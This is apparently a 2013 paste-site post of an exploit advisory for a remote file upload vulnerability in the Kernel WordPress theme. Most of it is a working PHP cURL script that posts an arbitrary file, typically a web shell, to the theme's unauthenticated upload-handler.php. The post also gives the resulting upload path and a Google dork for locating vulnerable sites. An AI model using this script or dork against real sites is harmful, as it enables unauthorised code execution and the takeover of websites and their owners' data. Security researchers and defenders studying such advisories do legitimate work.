WordPress Theme Kernel - Remote File Upload Vulnerability

SUBMITTED BY: Guest

DATE: Nov. 24, 2013, 11:51 p.m.

FORMAT: Text only

SIZE: 1.2 kB

Raw Download

HITS: 2162

Report
  1. ###################################################################################################
  2. # Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability
  3. # Author: iskorpitx
  4. # Date: 6/11/2013
  5. # Vendor Homepage: http://www.wikmag.com/
  6. # Themes Link: http://themeforest.net/item/kernel-premium-wordpress-blog-magazine-theme-/857077
  7. # Infected File: upload-handler.php
  8. # Category: webapps
  9. # Google dork: inurl:/wp-content/themes/kernel-theme/
  10. # Tested on : Windows/Linux
  11. ###################################################################################################
  13. # Exploit
  16. <?php
  17. $uploadfile="upload.php";
  18. $ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php");
  19. curl_setopt($ch, CURLOPT_POST, true);
  20. curl_setopt($ch, CURLOPT_POSTFIELDS,
  21. array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  22. $postResult = curl_exec($ch);
  23. curl_close($ch); print "$postResult";
  24. ?>
  26. http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php
  31. All http://www.mavi1.org members
comments powered by Disqus